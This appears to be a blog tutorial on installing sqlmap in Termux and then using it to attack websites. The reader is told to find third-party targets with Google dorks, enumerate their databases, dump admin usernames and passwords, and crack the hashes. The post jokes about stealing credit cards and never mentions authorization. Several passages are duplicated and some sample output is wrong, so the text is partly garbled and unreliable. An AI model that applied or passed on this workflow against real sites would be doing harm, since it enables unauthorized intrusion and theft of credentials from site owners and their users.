How to install and use SQLMAP in Termux
In this article, I am going to show you how to install and use SQLMAP in Termux. First of all, SQLMAP is an open-source tool that automatically detects and exploits SQL injection bug. By doing a SQL injection attack, an attacker can take over and manipulate a database on a server.
So from that, we can steal or retrieve a database from a website that we want For example, we can retrieve website admin id and password from the database.
And if you are lucky, you can get a CC (Credit Card/credit card) for those who like carding, can dump cc here just joking ok. Don't do any illegal activity with SQLMAP.😂😂
Ok now let's get started
Things needed:
- An android device with android version 5.0 or up.
- Termux application: Download.
- Good internet connection.
If you downloaded the Termux launch the Termux app.
First We are going to update the package list with the command:
apt update
Now we have to install Python with the following command:
apt install python python2
Wait until python is installed. After installing python we will install git. Git will help you to clone the package.
apt install git
After installing git we are going to clone the SQLMAP package into our directory with the help of git command.
git clone https://github.com/sqlmapproject/sqlmap
Wait for the process to be finished. As process finished now we need to enter the tool directory with the following command.
cd sqlmap
Now we need to give the permission of read-write and execute to the SQLMAP python file by using the command:
chmod +x sqlmap.py
After that, you need to run the following command in order to run the SQLMAP
python2 sqlmap.py
Now SQLMAP is successfully installed on your Termux.
If you want to run SQLMAP again next time then you need to launch the Termux then you need to enter the directory of SQLMAP by typing the following command cd sqlmap. And then you need to run the SQLMAP by using the following command python2 sqlmap.py.
Now let's see how to hack the website using SQLMAP
First, let me tell you. You can hack the websites that have SQL injection vulnerability.
Now you might be thinking about how to find a website that has SQL injection vulnerability.
You can use google dorks in order to find out SQL injection vulnerability in the website.
Most of the website have SQL injection vulnerability start with php?id=1 or any kind of value which is present after php?id=
To find the vulnerable websites you can use this google dork inurl: php?id=1 or any value after php?id=
You can find more information about Google dorks here: Google hacking
Type the following command:
This command will help you to find out the database of the website
python2 sqlmap.py -u <your website> --dbs
If the website is vulnerable then you will found the output similar to this:
*Information_schema
*Database
Now our next step is to find tables that are present in the database with the following command
python2 sqlmap.py -u <your website> –D Database –tables
The above command tells Sqlmap to find out tables that are present under the database.
After running the above command you will see tables something like this.
*id
*users
*admin
Now our next step is to find columns under the table admin.
python2 sqlmap.py -u <your website> -D Database -T admin --columns
The above command tells Sqlmap to find out columns under the table admin.
*id
*users
*admin
Now our next step is to find columns under the table admin.
python2 sqlmap.py -u <your website> -D Database -T admin --columns
The above command tells Sqlmap to find out columns under the table admin.
Now let's move on to our final command.
For example, you found the username and password under the column. Now we need to dump the username and password in text format in your android.
python2 sqlmap.py -u <your website> -D Database -T admin -C username, password --dump
For example, you found the username and password under the column. Now we need to dump the username and password in text format in your android.
python2 sqlmap.py -u <your website> -D Database -T admin -C username, password --dump
The above command will save the username and password in the text format in your device.
The password may be in an encrypted form such as md5 most of the passwords are in text form. If the password is encrypted then you need to decrypt the password using findmyhash or any other program which is used to decrypt the password.
With the help of the following steps, you can hack any SQL injection vulnerable website easily. Thank me later
The password may be in an encrypted form such as md5 most of the passwords are in text form. If the password is encrypted then you need to decrypt the password using findmyhash or any other program which is used to decrypt the password.
With the help of the following steps, you can hack any SQL injection vulnerable website easily. Thank me later
0 comments:
Post a Comment